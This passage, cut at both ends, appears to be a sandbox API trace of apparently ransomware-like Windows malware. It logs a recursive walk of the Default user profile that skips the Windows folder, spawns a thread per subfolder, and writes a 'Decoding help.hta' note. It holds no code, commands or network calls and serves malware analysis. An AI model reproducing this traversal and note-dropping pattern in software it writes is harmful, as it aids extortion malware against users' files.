nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.323] FindClose (in: hFindFile=0x5a52b0 | out: hFindFile=0x5a52b0) returned 1 Thread: id = 56 os_tid = 0xb14 [0039.317] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\*.*", lpFindFileData=0x64cfd30 | out: lpFindFileData=0x64cfd30*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5370 [0039.317] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.317] FindNextFileW (in: hFindFile=0x5a5370, lpFindFileData=0x64cfd30 | out: lpFindFileData=0x64cfd30*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x62fa4a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.318] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.318] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.318] FindNextFileW (in: hFindFile=0x5a5370, lpFindFileData=0x64cfd30 | out: lpFindFileData=0x64cfd30*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6320600, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0039.318] lstrcmpW (lpString1=".", lpString2="AppData") returned -1 [0039.318] lstrcmpW (lpString1="..", lpString2="AppData") returned -1 [0039.318] lstrcmpiW (lpString1="windows", lpString2="AppData") returned 1 [0039.319] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\*.*") returned="\\\\?\\C:\\Users\\Default\\*.*" [0039.319] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\*.*") returned 24 [0039.319] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\", lpString2="AppData" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData") returned="\\\\?\\C:\\Users\\Default\\AppData" [0039.319] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\*.*") returned="\\\\?\\C:\\Users\\Default\\AppData\\*.*" [0039.319] GlobalMemoryStatus (in: lpBuffer=0x64cfd10 | out: lpBuffer=0x64cfd10) [0039.320] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9762300, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0039.331] CloseHandle (hObject=0x1a8) returned 1 [0039.331] FindNextFileW (in: hFindFile=0x5a5370, lpFindFileData=0x64cfd30 | out: lpFindFileData=0x64cfd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0039.331] lstrcmpW (lpString1=".", lpString2="Application Data") returned -1 [0039.331] lstrcmpW (lpString1="..", lpString2="Application Data") returned -1 [0039.331] lstrcmpiW (lpString1="windows", lpString2="Application Data") returned 1 [0039.333] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\*.*") returned="\\\\?\\C:\\Users\\Default\\*.*" [0039.333] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\*.*") returned 24 [0039.333] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\", lpString2="Application Data" | out: lpString1="\\\\?\\C:\\Users\\Default\\Application Data") returned="\\\\?\\C:\\Users\\Default\\Application Data" [0039.333] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Application Data", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Application Data\\*.*") returned="\\\\?\\C:\\Users\\Default\\Application Data\\*.*" [0039.333] GlobalMemoryStatus (in: lpBuffer=0x64cfd10 | out: lpBuffer=0x64cfd10) [0039.333] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x97aa438, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0039.345] CloseHandle (hObject=0x1a8) returned 1 [0039.345] FindNextFileW (in: hFindFile=0x5a5370, lpFindFileData=0x64cfd30 | out: lpFindFileData=0x64cfd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6392a20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0039.345] lstrcmpW (lpString1=".", lpString2="Contacts") returned -1 [0039.345] lstrcmpW (lpString1="..", lpString2="Contacts") returned -1 [0039.345] lstrcmpiW (lpString1="windows", lpString2="Contacts") returned 1 [0039.347] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\*.*") returned="\\\\?\\C:\\Users\\Default\\*.*" [0039.347] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\*.*") returned 24 [0039.347] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\", lpString2="Contacts" | out: lpString1="\\\\?\\C:\\Users\\Default\\Contacts") returned="\\\\?\\C:\\Users\\Default\\Contacts" [0039.347] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Contacts", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Contacts\\*.*") returned="\\\\?\\C:\\Users\\Default\\Contacts\\*.*" [0039.347] GlobalMemoryStatus (in: lpBuffer=0x64cfd10 | out: lpBuffer=0x64cfd10) [0039.347] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9822640, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0039.359] CloseHandle (hObject=0x1a8) returned 1 [0039.359] FindNextFileW (in: hFindFile=0x5a5370, lpFindFileData=0x64cfd30 | out: lpFindFileData=0x64cfd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0039.359] lstrcmpW (lpString1=".", lpString2="Cookies") returned -1 [0039.359] lstrcmpW (lpString1="..", lpString2="Cookies") returned -1 [0039.359] lstrcmpiW (lpString1="windows", lpString2="Cookies") returned 1 [0039.361] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\*.*") returned="\\\\?\\C:\\Users\\Default\\*.*" [0039.361] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\*.*") returned 24 [0039.361] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\", lpString2="Cookies" | out: lpString1="\\\\?\\C:\\Users\\Default\\Cookies") returned="\\\\?\\C:\\Users\\Default\\Cookies" [0039.361] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Cookies", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Cookies\\*.*") returned="\\\\?\\C:\\Users\\Default\\Cookies\\*.*" [0039.361] GlobalMemoryStatus (in: lpBuffer=0x64cfd10 | out: lpBuffer=0x64cfd10) [0039.361] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x98827e0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0039.376] CloseHandle (hObject=0x1a8) returned 1 [0039.376] FindNextFileW (in: hFindFile=0x5a5370, lpFindFileData=0x64cfd30 | out: lpFindFileData=0x64cfd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda4e0ba, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd8868f0a, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0039.376] lstrcmpW (lpString1=".", lpString2="Desktop") returned -1 [0039.376] lstrcmpW (lpString1="..", lpString2="Desktop") returned -1 [0039.376] lstrcmpiW (lpString1="windows", lpString2="Desktop") returned 1 [0039.376] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\*.*") returned="\\\\?\\C:\\Users\\Default\\*.*" [0039.376] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\*.*") returned 24 [0039.376] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\", lpString2="Desktop" | out: lpString1="\\\\?\\C:\\Users\\Default\\Desktop") returned="\\\\?\\C:\\Users\\Default\\Desktop" [0039.376] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Desktop", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Desktop\\*.*") returned="\\\\?\\C:\\Users\\Default\\Desktop\\*.*" [0039.376] GlobalMemoryStatus (in: lpBuffer=0x64cfd10 | out: lpBuffer=0x64cfd10) [0039.377] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x5c90388, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0039.387] CloseHandle (hObject=0x1a8) returned 1 [0039.387] FindNextFileW (in: hFindFile=0x5a5370, lpFindFileData=0x64cfd30 | out: lpFindFileData=0x64cfd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd890148c, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0039.387] lstrcmpW (lpString1=".", lpString2="Documents") returned -1 [0039.387] lstrcmpW (lpString1="..", lpString2="Documents") returned -1 [0039.387] lstrcmpiW (lpString1="windows", lpString2="Documents") returned 1 [0039.389] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\*.*") returned="\\\\?\\C:\\Users\\Default\\*.*" [0039.389] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\*.*") returned 24 [0039.389] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\", lpString2="Documents" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents") returned="\\\\?\\C:\\Users\\Default\\Documents" [0039.389] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Documents", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Documents\\*.*") returned="\\\\?\\C:\\Users\\Default\\Documents\\*.*" [0039.389] GlobalMemoryStatus (in: lpBuffer=0x64cfd10 | out: lpBuffer=0x64cfd10) [0039.389] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9912a50, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0039.401] CloseHandle (hObject=0x1a8) returned 1 [0039.402] FindNextFileW (in: hFindFile=0x5a5370, lpFindFileData=0x64cfd30 | out: lpFindFileData=0x64cfd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88db32b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0039.402] lstrcmpW (lpString1=".", lpString2="Downloads") returned -1 [0039.402] lstrcmpW (lpString1="..", lpString2="Downloads") returned -1 [0039.402] lstrcmpiW (lpString1="windows", lpString2="Downloads") returned 1 [0039.403] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\*.*") returned="\\\\?\\C:\\Users\\Default\\*.*" [0039.403] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\*.*") returned 24 [0039.403] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\", lpString2="Downloads" | out: lpString1="\\\\?\\C:\\Users\\Default\\Downloads") returned="\\\\?\\C:\\Users\\Default\\Downloads" [0039.403] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Downloads", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Downloads\\*.*") returned="\\\\?\\C:\\Users\\Default\\Downloads\\*.*" [0039.403] GlobalMemoryStatus (in: lpBuffer=0x64cfd10 | out: lpBuffer=0x64cfd10) [0039.403] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9972bf0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0039.417] CloseHandle (hObject=0x1a8) returned 1 [0039.417] FindNextFileW (in: hFindFile=0x5a5370, lpFindFileData=0x64cfd30 | out: lpFindFileData=0x64cfd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0039.417] lstrcmpW (lpString1=".", lpString2="Favorites") returned -1 [0039.418] lstrcmpW (lpString1="..", lpString2="Favorites") returned -1 [0039.418] lstrcmpiW (lpString1="windows", lpString2="Favorites") returned 1 [0039.419] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\*.*") returned="\\\\?\\C:\\Users\\Default\\*.*" [0039.419] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\*.*") returned 24 [0039.419] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\", lpString2="Favorites" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites") returned="\\\\?\\C:\\Users\\Default\\Favorites" [0039.419] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Favorites", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Favorites\\*.*") returned="\\\\?\\C:\\Users\\Default\\Favorites\\*.*" [0039.419] GlobalMemoryStatus (in: lpBuffer=0x64cfd10 | out: lpBuffer=0x64cfd10) [0039.419] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x99eadf8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0039.441] CloseHandle (hObject=0x1a8) returned 1 [0039.441] FindNextFileW (in: hFindFile=0x5a5370, lpFindFileData=0x64cfd30 | out: lpFindFileData=0x64cfd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x636c8c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd89738ac, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0039.441] lstrcmpW (lpString1=".", lpString2="Links") returned -1 [0039.441] lstrcmpW (lpString1="..", lpString2="Links") returned -1 [0039.441] lstrcmpiW (lpString1="windows", lpString2="Links") returned 1 [0039.443] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\*.*") returned="\\\\?\\C:\\Users\\Default\\*.*" [0039.443] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\*.*") returned 24 [0039.443] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\", lpString2="Links" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links") returned="\\\\?\\C:\\Users\\Default\\Links" [0039.443] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Links", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Links\\*.*") returned="\\\\?\\C:\\Users\\Default\\Links\\*.*" [0039.443] GlobalMemoryStatus (in: lpBuffer=0x64cfd10 | out: lpBuffer=0x64cfd10) [0039.444] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9a4af98, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0039.464] CloseHandle (hObject=0x1a8) returned 1 [0039.464] FindNextFileW (in: hFindFile=0x5a5370, lpFindFileData=0x64cfd30 | out: lpFindFileData=0x64cfd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x30702f92, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x30702f92, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x30702f92, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0039.464] lstrcmpW (lpString1=".", lpString2="Local Settings") returned -1 [0039.464] lstrcmpW (lpString1="..", lpString2="Local Settings") returned -1 [0039.464] lstrcmpiW (lpString1="windows", lpString2="Local Settings") returned 1 [0039.466] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\*.*") returned="\\\\?\\C:\\Users\\Default\\*.*" [0039.466] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\*.*") returned 24 [0039.466] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\", lpString2="Local Settings" | out: lpString1="\\\\?\\C:\\Users\\Default\\Local Settings") returned="\\\\?\\C:\\Users\\Default\\Local Settings" [0039.466] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Local Settings", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Local Settings\\*.*") returned="\\\\?\\C:\\Users\\Default\\Local Settings\\*.*" [0039.466] GlobalMemoryStatus (in: lpBuffer=0x64cfd10 | out: lpBuffer=0x64cfd10) [0039.466] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9a63000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0039.492] CloseHandle (hObject=0x1a8) returned 1 [0039.493] FindNextFileW (in: hFindFile=0x5a5370, lpFindFileData=0x64cfd30 | out: lpFindFileData=0x64cfd30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda9a36e, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd888f06b, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0039.493] lstrcmpW (lpString1=".", lpString2="Music") returned -1 [0039.493] lstrcmpW (lpString1="..", lpString2="Music") returned -1 [0039.493] lstrcmpiW (lpString1="windows", lpString2="Music") returned 1 [0039.494] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\*.*") returned="\\\\?\\C:\\Users\\Default\\*.*" [0039.494] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\*.*") returned 24 [0039.494] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\", lpString2="Music" | out: lpString1="\\\\?\\C:\\Users\\Default\\Music") returned="\\\\?\\C:\\Users\\Default\\Music" [0039.494] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\Music", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\Music\\*.*") returned="\\\\?\\C:\\Users\\Default\\Music\\*.*" [0039.494] GlobalMemoryStatus (in: lpBuffer=0x64cfd10 | out: lpBuffer=0x64cfd10) [0039.494] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9aab138, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0039.506] CloseHandle (hObject=0x1a8) returned 1 [0039.506] FindNextFileW (in: hFindFile=0x5a5370, lpFindFileData=0x64cfd30 | out: lpFindFileData=0x64cfd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306b6cd1, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306b6cd1, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306b6cd1, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0039.506] lstrcmpW (lpString1=".", lpString2="My Documents") returned -1 [0039.506] lstrcmpW (lpString1="..", lpString2="My Documents") returned -1 [0039.506] lstrcmpiW (lpString1="windows", lpString2="My Documents") returned 1 [0039.508] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\*.*") returned="\\\\?\\C:\\Users\\Default\\*.*" [0039.508] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\*.*") returned 24 [0039.508] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\", lpString2="My Documents" | out: lpString1="\\\\?\\C:\\Users\\Default\\My Documents") returned="\\\\?\\C:\\Users\\Default\\My Documents" [0039.508] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\My Documents", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\My Documents\\*.*") returned="\\\\?\\C:\\Users\\Default\\My Documents\\*.*" [0039.508] GlobalMemoryStatus (in: lpBuffer=0x64cfd10 | out: lpBuffer=0x64cfd10) [0039.508] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x107a80b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0039.514] CloseHandle (hObject=0x1a8) returned 1 [0039.514] FindNextFileW (in: hFindFile=0x5a5370, lpFindFileData=0x64cfd30 | out: lpFindFileData=0x64cfd30*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0039.514] lstrcmpW (lpString1=".", lpString2="NetHood") returned -1 [0039.514] lstrcmpW (lpString1="..", lpString2="NetHood") returned -1 [0039.514] lstrcmpiW (lpString1="windows", lpString2="NetHood") returned 1 [0039.516] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\Default\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\*.*") returned="\\\\?\\C:\\Users\\Default\\*.*" [0039.516] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\*.*") returned 24 [0039.516] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\", lpString2="NetHood" | out: lpString1="\\\\?\\C:\\Users\\Default\\NetHood") returned="\\\\?\\C:\\Users\\Default\\NetHood" [0039.516] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\NetHood", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\NetHood\\*.*") returned="\\\\?\\C:\\Users\\Default\\NetHood\\*.*" [0039.516] GlobalMemoryStatus (in: lpBuffer=0x64cfd10 | out: lpBuffer=0x64cfd10) [0039.516] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x107c0118, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1a8 [0040.514] CloseHandle (hObject=0x1a8) returned 1 [0040.514] FindNextFileW (in: hFindFile=0x5a5370, lpFindFileData=0x64cfd30 | out: lpFindFileData=0x64cfd30*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x9012aa61, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6770de0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x6770de0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xc0000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0040.514] lstrcpyW (in: lpString1=0x9a6b008, lpString2="\\\\?\\C:\\Users\\Default\\*.*" | out: lpString1="\\\\?\\C:\\Users\\Default\\*.*") returned="\\\\?\\C:\\Users\\Default\\*.*" [0040.514] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\*.*") returned 24 [0040.514] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\Default\\Decoding help.hta") returned="\\\\?\\C:\\Users\\Default\\Decoding help.hta" [0040.514] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Decoding help.hta" (normalized: "c:\\users\\default\\decoding help.hta")) returned 0xffffffff [0040.515] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Decoding help.hta" (normalized: "c:\\users\\default\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x518 [0042.072] WriteFile (in: hFile=0x518, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x64cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x64cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.073] CloseHandle 